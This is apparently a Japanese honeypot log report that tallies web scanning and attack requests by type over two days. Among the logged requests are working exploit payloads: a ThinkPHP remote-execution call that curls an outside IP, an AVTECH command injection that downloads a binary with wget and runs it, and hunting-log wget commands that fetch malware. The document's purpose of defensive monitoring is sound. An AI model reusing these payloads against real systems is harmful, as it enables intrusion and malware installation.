2 2018-12-14 phpのWebShell設置の調査 POST /MCLi.php
2 2018-12-14 phpのWebShell設置の調査 POST /lindex.php
2 2018-12-14 phpのWebShell設置の調査 POST /l8.php
2 2018-12-14 phpのWebShell設置の調査 POST /l7.php
2 2018-12-14 phpのWebShell設置の調査 POST /l6.php
2 2018-12-14 phpのWebShell設置の調査 POST /ip.php
2 2018-12-14 phpのWebShell設置の調査 POST /infoo.php
2 2018-12-14 phpのWebShell設置の調査 POST /hm.php
2 2018-12-14 phpのWebShell設置の調査 POST /help.php
2 2018-12-14 phpのWebShell設置の調査 POST /hello.php
2 2018-12-14 phpのWebShell設置の調査 POST /hack.php
2 2018-12-14 phpのWebShell設置の調査 POST /h1.php
2 2018-12-14 phpのWebShell設置の調査 POST /feixiang.php
2 2018-12-14 phpのWebShell設置の調査 POST /dexgp.php
2 2018-12-14 phpのWebShell設置の調査 POST /defect.php
2 2018-12-14 phpのWebShell設置の調査 POST /default.php
2 2018-12-14 phpのWebShell設置の調査 POST /db_session.init.php
2 2018-12-14 phpのWebShell設置の調査 POST /db.init.php
2 2018-12-14 phpのWebShell設置の調査 POST /db_desql.php
2 2018-12-14 phpのWebShell設置の調査 POST /db_dataml.php
2 2018-12-14 phpのWebShell設置の調査 POST /core.php
2 2018-12-14 phpのWebShell設置の調査 POST /conflg.php
2 2018-12-14 phpのWebShell設置の調査 POST /cmd.php
2 2018-12-14 phpのWebShell設置の調査 POST /ceshi.php
2 2018-12-14 phpのWebShell設置の調査 POST /caonma.php
2 2018-12-14 phpのWebShell設置の調査 POST /cainiao.php
2 2018-12-14 phpのWebShell設置の調査 POST /boots.php
2 2018-12-14 phpのWebShell設置の調査 POST /bak.php
2 2018-12-14 phpのWebShell設置の調査 POST /aw.php
2 2018-12-14 phpのWebShell設置の調査 POST /app.php
2 2018-12-14 phpのWebShell設置の調査 POST /aotu.php
2 2018-12-14 phpのWebShell設置の調査 POST /ak.php
2 2018-12-14 phpのWebShell設置の調査 POST /ak48.php
2 2018-12-14 phpのWebShell設置の調査 POST /ak47.php
2 2018-12-14 phpのWebShell設置の調査 POST /aaaa.php
2 2018-12-14 phpのWebShell設置の調査 POST /9678.php
2 2018-12-14 phpのWebShell設置の調査 POST /9510.php
2 2018-12-14 phpのWebShell設置の調査 POST /92.php
2 2018-12-14 phpのWebShell設置の調査 POST /56.php
2 2018-12-14 phpのWebShell設置の調査 POST /3.php
2 2018-12-14 phpのWebShell設置の調査 POST /1hou.php
2 2018-12-14 phpのWebShell設置の調査 POST /12.php
2 2018-12-14 phpのWebShell設置の調査 POST /1213.php
2 2018-12-14 phpのWebShell設置の調査 GET /z.php
2 2018-12-14 JBossに対する調査 GET /zecmd/zecmd.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpのWebShell設置の調査 GET /x.php
2 2018-12-14 JBossに対する調査 GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpのWebShell設置の調査 GET /wpo.php
2 2018-12-14 phpのWebShell設置の調査 GET /wpc.php
2 2018-12-14 PHPWetherMapの調査 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
2 2018-12-14 phpのWebShell設置の調査 GET /wp-config.php
2 2018-12-14 WebDAVの調査 GET /webdav/
2 2018-12-14 phpMyAdminの調査 GET /v/index.php
2 2018-12-14 phpのWebShell設置の調査 GET /uploader.php
2 2018-12-14 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
2 2018-12-14 phpのWebShell設置の調査 GET /text.php
2 2018-12-14 phpのWebShell設置の調査 GET /test.php
2 2018-12-14 PHPWetherMapの調査 GET /shopdb/index.php
2 2018-12-14 JBossに対する調査 GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpMyAdminの調査 GET /shaAdmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /scripts/setup.php
2 2018-12-14 クローリング GET /robots.txt
2 2018-12-14 phpのWebShell設置の調査 GET /_query.php
2 2018-12-14 phpMyAdminの調査 GET /pwd/index.php
2 2018-12-14 phpMyAdminの調査 GET /program/index.php
2 2018-12-14 phpMyAdminの調査 GET /pmd_online.php
2 2018-12-14 phpMyAdminの調査 GET /pmd/index.php
2 2018-12-14 phpMyAdminの調査 GET /pma-old/index.php
2 2018-12-14 phpMyAdminの調査 GET /pmamy/index.php
2 2018-12-14 phpMyAdminの調査 GET /pmamy2/index.php
2 2018-12-14 phpMyAdminの調査 GET /PMA/index.php
2 2018-12-14 phpMyAdminの調査 GET /pma/index.php
2 2018-12-14 PHPWetherMapの調査 GET /plugins/weathermap/editor.php
2 2018-12-14 PHPWetherMapの調査 GET /phppma/index.php
2 2018-12-14 PHPWetherMapの調査 GET /phpmy/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmion/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin/scripts/db___.init.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin/scripts/db___.init.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin/phpmyadmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdminold/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin.old/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin-old/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin+++---/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin__/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyadmin_bak/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmina/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin-4.4.0/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin2/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin1/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin123/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadmin0/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyadmi/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAdm1n/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpmyadm1n/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpMyAbmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpma/index.php
2 2018-12-14 phpMyAdminの調査 GET /phpadmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql/sqlmanager/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql/dbadmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysqladmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql/admin/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql-admin/index.php
2 2018-12-14 phpMyAdminの調査 GET /mysql_admin/index.php
2 2018-12-14 phpMyAdminの調査 GET /MyAdmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /myadmin/index.php
2 2018-12-14 phpのWebShell設置の調査 GET /muhstiks.php
2 2018-12-14 phpのWebShell設置の調査 GET /muhstik.php
2 2018-12-14 phpのWebShell設置の調査 GET /lol.php
2 2018-12-14 phpのWebShell設置の調査 GET /log.php
2 2018-12-14 phpのWebShell設置の調査 GET /logon.php
2 2018-12-14 phpのWebShell設置の調査 GET /license.php
2 2018-12-14 phpのWebShell設置の調査 GET /lala-dpr.php
2 2018-12-14 phpのWebShell設置の調査 GET /knal.php
2 2018-12-14 JBossに対する調査 GET /jvrx/cmd.jsp?pwd=everymorning&cmd=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-14 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=curl%2046.30.43.159:81/zz
2 2018-12-14 phpMyAdminの調査 GET /index.php
2 2018-12-14 JBossに対する調査 GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-14 不正中継の調査 GET hxxp://www.123cha.com
2 2018-12-14 phpのWebShell設置の調査 GET /htdocs.php
2 2018-12-14 phpのWebShell設置の調査 GET /help.php
2 2018-12-14 phpのWebShell設置の調査 GET /help-e.php
2 2018-12-14 phpのWebShell設置の調査 GET /hell.php
2 2018-12-14 JBossに対する調査 GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-14 JBossに対する調査 GET /dread/lock.jsp?tezaz=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpのWebShell設置の調査 GET /desktop.ini.php
2 2018-12-14 JBossに対する調査 GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpMyAdminの調査 GET /db_pma.php
2 2018-12-14 phpMyAdminの調査 GET /db/index.php
2 2018-12-14 phpのWebShell設置の調査 GET /db_cts.php
2 2018-12-14 phpMyAdminの調査 GET /dbadmin/index.php
2 2018-12-14 JBossに対する調査 GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpのWebShell設置の調査 GET /cmx.php
2 2018-12-14 phpのWebShell設置の調査 GET /cmv.php
2 2018-12-14 phpのWebShell設置の調査 GET /cmdd.php
2 2018-12-14 PHPWetherMapの調査 GET /cacti/plugins/weathermap/editor.php
2 2018-12-14 JBossに対する調査 GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r
2 2018-12-14 phpのWebShell設置の調査 GET /appserv.php
2 2018-12-14 phpMyAdminの調査 GET /admin/PMA/index.php
2 2018-12-14 phpMyAdminの調査 GET /admin/pma/index.php
2 2018-12-14 phpMyAdminの調査 GET /admin/phpmyadmin/index.php
2 2018-12-14 phpMyAdminの調査 GET /admin/phpmyadmin2/index.php
2 2018-12-14 phpMyAdminの調査 GET /admin/mysql/index.php
2 2018-12-14 phpMyAdminの調査 GET /admin/index.php
2 2018-12-14 不正中継の調査 CONNECT www.baidu.com
2 2018-12-14 不正中継の調査 CONNECT 133.130.126.119:43
1 2018-12-14 phpのWebShell設置の調査 POST /zzk.php
1 2018-12-14 phpのWebShell設置の調査 POST /zuo.php
1 2018-12-14 phpのWebShell設置の調査 POST /zshmindex.php
1 2018-12-14 phpのWebShell設置の調査 POST /yj.php
1 2018-12-14 phpのWebShell設置の調査 POST /xw.php
1 2018-12-14 phpのWebShell設置の調査 POST /xp.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaoyu.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaomo.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaoma.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaomae.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaohei.php
1 2018-12-14 phpのWebShell設置の調査 POST /xiaodai.php
1 2018-12-14 phpのWebShell設置の調査 POST /wb.php
1 2018-12-14 phpのWebShell設置の調査 POST /toor.php
1 2018-12-14 phpのWebShell設置の調査 POST /ss.php
1 2018-12-14 phpのWebShell設置の調査 POST /she.php
1 2018-12-14 phpのWebShell設置の調査 POST /sean.php
1 2018-12-14 phpのWebShell設置の調査 POST /s1.php
1 2018-12-14 phpのWebShell設置の調査 POST /ruyi.php
1 2018-12-14 phpのWebShell設置の調査 POST /repeat.php
1 2018-12-14 phpのWebShell設置の調査 POST /qwq.php
1 2018-12-14 phpのWebShell設置の調査 POST /qq5262.php
1 2018-12-14 phpのWebShell設置の調査 POST /python.php
1 2018-12-14 phpのWebShell設置の調査 POST /p.php
1 2018-12-14 phpMyAdminの調査 POST /pma.php
1 2018-12-14 phpのWebShell設置の調査 POST /.php
1 2018-12-14 phpのWebShell設置の調査 POST /okokok.php
1 2018-12-14 phpのWebShell設置の調査 POST /nuoxi.php
1 2018-12-14 phpのWebShell設置の調査 POST /m.php
1 2018-12-14 phpのWebShell設置の調査 POST /mm.php
1 2018-12-14 phpのWebShell設置の調査 POST /log.php
1 2018-12-14 phpのWebShell設置の調査 POST /linuxse.php
1 2018-12-14 phpのWebShell設置の調査 POST /ldw.php
1 2018-12-14 phpのWebShell設置の調査 POST /j.php
1 2018-12-14 phpのWebShell設置の調査 POST /infos.php
1 2018-12-14 phpのWebShell設置の調査 POST /HX.php
1 2018-12-14 phpのWebShell設置の調査 POST /htfr.php
1 2018-12-14 phpのWebShell設置の調査 POST /hh.php
1 2018-12-14 phpのWebShell設置の調査 POST /hell.php
1 2018-12-14 phpのWebShell設置の調査 POST /hacly.php
1 2018-12-14 phpのWebShell設置の調査 POST /godkey.php
1 2018-12-14 phpのWebShell設置の調査 POST /general.php
1 2018-12-14 phpのWebShell設置の調査 POST /fusheng.php
1 2018-12-14 phpのWebShell設置の調査 POST /fack.php
1 2018-12-14 phpのWebShell設置の調査 POST /erwa.php
1 2018-12-14 phpのWebShell設置の調査 POST /diy.php
1 2018-12-14 phpのWebShell設置の調査 POST /db.php
1 2018-12-14 phpのWebShell設置の調査 POST /db__.init.php
1 2018-12-14 phpのWebShell設置の調査 POST /data.php
1 2018-12-14 phpのWebShell設置の調査 POST /cxfm666.php
1 2018-12-14 phpのWebShell設置の調査 POST /conf.php
1 2018-12-14 phpのWebShell設置の調査 POST /conf1g.php
1 2018-12-14 phpのWebShell設置の調査 POST /cadre.php
1 2018-12-14 phpのWebShell設置の調査 POST /api.php
1 2018-12-14 phpのWebShell設置の調査 POST /angge.php
1 2018-12-14 phpのWebShell設置の調査 POST /aa.php
1 2018-12-14 phpのWebShell設置の調査 POST /7.php
1 2018-12-14 phpのWebShell設置の調査 POST /777.php
1 2018-12-14 phpのWebShell設置の調査 POST /666.php
1 2018-12-14 phpのWebShell設置の調査 POST /5201314.php
1 2018-12-14 phpのWebShell設置の調査 POST /51.php
1 2018-12-14 phpのWebShell設置の調査 POST /51314.php
1 2018-12-14 phpのWebShell設置の調査 POST /123.php
1 2018-12-14 調査 HEAD /
1 2018-12-14 phpMyAdminの調査 GET /xampp/phpmyadmin/index.php
1 2018-12-14 phpMyAdminの調査 GET /PMA2/index.php
1 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin/index.php
1 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin1/index.php
1 2018-12-14 phpMyAdminの調査 GET /phpAdmin/index.php
1 2018-12-14 phpMyAdminの調査 GET /mysql/mysqlmanager/index.php
1 2018-12-14 phpMyAdminの調査 GET /myadmin2/index.php
1 2018-12-14 phpのWebShell設置の調査 GET /muhstik-dpr.php
1 2018-12-14 phpのWebShell設置の調査 GET /muhstik2.php
1 2018-12-14 phpのWebShell設置の調査 GET /lala.php
1 2018-12-14 phpのWebShell設置の調査 GET /java.php
1 2018-12-14 不正中継の調査 GET hxxp://www.ip.cn/
1 2018-12-14 不正中継の調査 GET hxxp://www.123cha.com/
1 2018-12-14 不正中継の調査 GET hxxp://api.ipify.org/
1 2018-12-14 AVTECHの脆弱性を突くMirai亜種の攻撃 GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
1 2018-12-14 phpMyAdminの調査 GET /admin/mysql2/index.php
1 2018-12-14 不正中継の調査 CONNECT www.baidu.com:443
1 2018-12-14 不正中継の調査 CONNECT cn.bing.com:443

 

以上です。

ハニーポットのログ分析(2018/12/13)

WOWhoneypotの2018/12/13(木) (運用190日目)の簡易分析です。
本日の総アクセス件数は 635件です。

主なアクセスは以下です。

phpのWebShell設置の調査:303件
phpMyAdminの調査:149件
JBossに対する調査:37件
Tomcat管理ページへのブルートフォース攻撃:18件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:4件 

 本日のドメイン名でのアクセスは以下です。

6 GET /
2 GET /robots.txt
1 POST /wp-login.php

本日のハンティングログは以下です。

1 2018-12-13 wget -c hxxp://wap.tfddos.net:57843/linux
1 2018-12-13 wget -c hxxp://198.44.228.121:1314/123 

 

以下が全アクセスログです。

件数 日付 種別 リクエス
84 2018-12-13 アクセス GET /
18 2018-12-13 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
5 2018-12-13 phpのWebShell設置の調査 POST /qq.php
4 2018-12-13 phpのWebShell設置の調査 POST /xx.php
4 2018-12-13 phpのWebShell設置の調査 POST /confg.php
4 2018-12-13 phpのWebShell設置の調査 POST /1.php
4 2018-12-13 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
4 2018-12-13 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
4 2018-12-13 phpのWebShell設置の調査 GET /shell.php
4 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php
4 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin/index.php
4 2018-12-13 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
4 2018-12-13 phpのWebShell設置の調査 GET /cmd.php
4 2018-12-13 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
4 2018-12-13 phpMyAdminの調査 GET /admin/phpMyAdmin/index.php
3 2018-12-13 phpのWebShell設置の調査 POST /test.php
3 2018-12-13 phpのWebShell設置の調査 POST /s.php
3 2018-12-13 phpのWebShell設置の調査 POST /q.php
2 2018-12-13 IIS脆弱性(CVE-2017-7269)を突く攻撃 PROPFIND /
2 2018-12-13 phpのWebShell設置の調査 POST /zuoshou.php
2 2018-12-13 phpのWebShell設置の調査 POST /zuo.php
2 2018-12-13 phpのWebShell設置の調査 POST /z.php
2 2018-12-13 phpのWebShell設置の調査 POST /yumo.php
2 2018-12-13 phpのWebShell設置の調査 POST /yao.php
2 2018-12-13 phpのWebShell設置の調査 POST /xw.php
2 2018-12-13 phpのWebShell設置の調査 POST /xw1.php
2 2018-12-13 phpのWebShell設置の調査 POST /xshell.php
2 2018-12-13 phpのWebShell設置の調査 POST /x.php
2 2018-12-13 WordPressへの攻撃 POST /xmlrpc.php
2 2018-12-13 phpのWebShell設置の調査 POST /xiao.php
2 2018-12-13 phpのWebShell設置の調査 POST /wuwu11.php
2 2018-12-13 Hadoop YARN ResourceManagerの脆弱性を突く攻撃 POST /ws/v1/cluster/apps/new-application
2 2018-12-13 phpのWebShell設置の調査 POST /wshell.php
2 2018-12-13 phpのWebShell設置の調査 POST /w.php
2 2018-12-13 phpのWebShell設置の調査 POST /weixiao.php
2 2018-12-13 phpのWebShell設置の調査 POST /webslee.php
2 2018-12-13 phpのWebShell設置の調査 POST /wc.php
2 2018-12-13 phpのWebShell設置の調査 POST /system.php
2 2018-12-13 phpのWebShell設置の調査 POST /sheep.php
2 2018-12-13 phpのWebShell設置の調査 POST /qaq.php
2 2018-12-13 phpのWebShell設置の調査 POST /phpStudy.php
2 2018-12-13 phpのWebShell設置の調査 POST /phpstudy.php
2 2018-12-13 phpのWebShell設置の調査 POST /pe.php
2 2018-12-13 phpのWebShell設置の調査 POST /mz.php
2 2018-12-13 phpのWebShell設置の調査 POST /min.php
2 2018-12-13 phpのWebShell設置の調査 POST /MCLi.php
2 2018-12-13 phpのWebShell設置の調査 POST /lindex.php
2 2018-12-13 phpのWebShell設置の調査 POST /l8.php
2 2018-12-13 phpのWebShell設置の調査 POST /l7.php
2 2018-12-13 phpのWebShell設置の調査 POST /hm.php
2 2018-12-13 phpのWebShell設置の調査 POST /hello.php
2 2018-12-13 phpのWebShell設置の調査 POST /feixiang.php
2 2018-12-13 phpのWebShell設置の調査 POST /defect.php
2 2018-12-13 phpのWebShell設置の調査 POST /db_session.init.php
2 2018-12-13 phpのWebShell設置の調査 POST /db.init.php
2 2018-12-13 phpのWebShell設置の調査 POST /conflg.php
2 2018-12-13 phpのWebShell設置の調査 POST /cmd.php
2 2018-12-13 phpのWebShell設置の調査 POST /cainiao.php
2 2018-12-13 phpのWebShell設置の調査 POST /bak.php
2 2018-12-13 phpのWebShell設置の調査 POST /aotu.php
2 2018-12-13 phpのWebShell設置の調査 POST /ak47.php
2 2018-12-13 phpのWebShell設置の調査 POST /9678.php
2 2018-12-13 phpのWebShell設置の調査 POST /56.php
2 2018-12-13 phpのWebShell設置の調査 POST /2.php
2 2018-12-13 phpのWebShell設置の調査 GET /z.php
2 2018-12-13 phpのWebShell設置の調査 GET /x.php
2 2018-12-13 phpMyAdminの調査 GET /xampp/phpmyadmin/index.php
2 2018-12-13 JBossに対する調査 GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpのWebShell設置の調査 GET /wpo.php
2 2018-12-13 phpのWebShell設置の調査 GET /wpc.php
2 2018-12-13 phpのWebShell設置の調査 GET /wp-config.php
2 2018-12-13 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
2 2018-12-13 WebDAVの調査 GET /webdav/
2 2018-12-13 phpMyAdminの調査 GET /v/index.php
2 2018-12-13 phpのWebShell設置の調査 GET /uploader.php
2 2018-12-13 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
2 2018-12-13 phpのWebShell設置の調査 GET /text.php
2 2018-12-13 phpのWebShell設置の調査 GET /test.php
2 2018-12-13 PHPWetherMapの調査 GET /shopdb/index.php
2 2018-12-13 JBossに対する調査 GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpMyAdminの調査 GET /shaAdmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /scripts/setup.php
2 2018-12-13 クローリング GET /robots.txt
2 2018-12-13 phpMyAdminの調査 GET /program/index.php
2 2018-12-13 phpMyAdminの調査 GET /pmd/index.php
2 2018-12-13 phpMyAdminの調査 GET /pma-old/index.php
2 2018-12-13 phpMyAdminの調査 GET /pmamy/index.php
2 2018-12-13 phpMyAdminの調査 GET /pmamy2/index.php
2 2018-12-13 phpMyAdminの調査 GET /PMA/index.php
2 2018-12-13 phpMyAdminの調査 GET /pma/index.php
2 2018-12-13 phpMyAdminの調査 GET /PMA2/index.php
2 2018-12-13 PHPWetherMapの調査 GET /plugins/weathermap/editor.php
2 2018-12-13 PHPWetherMapの調査 GET /phppma/index.php
2 2018-12-13 PHPWetherMapの調査 GET /phpmy/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmion/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin/scripts/db___.init.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin/scripts/db___.init.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin/phpmyadmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin.old/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin-old/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin+++---/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin__/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyadmin_bak/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmina/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin2/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin1/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdmin123/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadmin0/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyadmi/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAdm1n/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpmyadm1n/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpMyAbmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpma/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpAdmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /phpadmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql/sqlmanager/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql/mysqlmanager/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql/dbadmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysqladmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql/admin/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql-admin/index.php
2 2018-12-13 phpMyAdminの調査 GET /mysql_admin/index.php
2 2018-12-13 phpMyAdminの調査 GET /MyAdmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /myadmin2/index.php
2 2018-12-13 phpのWebShell設置の調査 GET /muhstiks.php
2 2018-12-13 phpのWebShell設置の調査 GET /muhstik.php
2 2018-12-13 phpのWebShell設置の調査 GET /muhstik-dpr.php
2 2018-12-13 phpのWebShell設置の調査 GET /muhstik2.php
2 2018-12-13 phpのWebShell設置の調査 GET /lol.php
2 2018-12-13 phpのWebShell設置の調査 GET /log.php
2 2018-12-13 phpのWebShell設置の調査 GET /logon.php
2 2018-12-13 phpのWebShell設置の調査 GET /license.php
2 2018-12-13 phpのWebShell設置の調査 GET /lala.php
2 2018-12-13 phpのWebShell設置の調査 GET /lala-dpr.php
2 2018-12-13 phpのWebShell設置の調査 GET /knal.php
2 2018-12-13 JBossに対する調査 GET /jvrx/cmd.jsp?pwd=everymorning&cmd=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpのWebShell設置の調査 GET /java.php
2 2018-12-13 phpMyAdminの調査 GET /index.php
2 2018-12-13 JBossに対する調査 GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-13 不正中継の調査 GET hxxp://www.baidu.com/
2 2018-12-13 phpのWebShell設置の調査 GET /help.php
2 2018-12-13 phpのWebShell設置の調査 GET /help-e.php
2 2018-12-13 phpのWebShell設置の調査 GET /hell.php
2 2018-12-13 JBossに対する調査 GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r
2 2018-12-13 JBossに対する調査 GET /dread/lock.jsp?tezaz=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpのWebShell設置の調査 GET /desktop.ini.php
2 2018-12-13 JBossに対する調査 GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpMyAdminの調査 GET /db_pma.php
2 2018-12-13 phpMyAdminの調査 GET /db/index.php
2 2018-12-13 phpのWebShell設置の調査 GET /db_cts.php
2 2018-12-13 phpMyAdminの調査 GET /dbadmin/index.php
2 2018-12-13 JBossに対する調査 GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpのWebShell設置の調査 GET /cmx.php
2 2018-12-13 phpのWebShell設置の調査 GET /cmv.php
2 2018-12-13 phpのWebShell設置の調査 GET /cmdd.php
2 2018-12-13 PHPWetherMapの調査 GET /cacti/plugins/weathermap/editor.php
2 2018-12-13 JBossに対する調査 GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r
2 2018-12-13 phpのWebShell設置の調査 GET /appserv.php
2 2018-12-13 phpMyAdminの調査 GET /admin/PMA/index.php
2 2018-12-13 phpMyAdminの調査 GET /admin/pma/index.php
2 2018-12-13 phpMyAdminの調査 GET /admin/phpmyadmin/index.php
2 2018-12-13 phpMyAdminの調査 GET /admin/phpmyadmin2/index.php
2 2018-12-13 phpMyAdminの調査 GET /admin/mysql/index.php
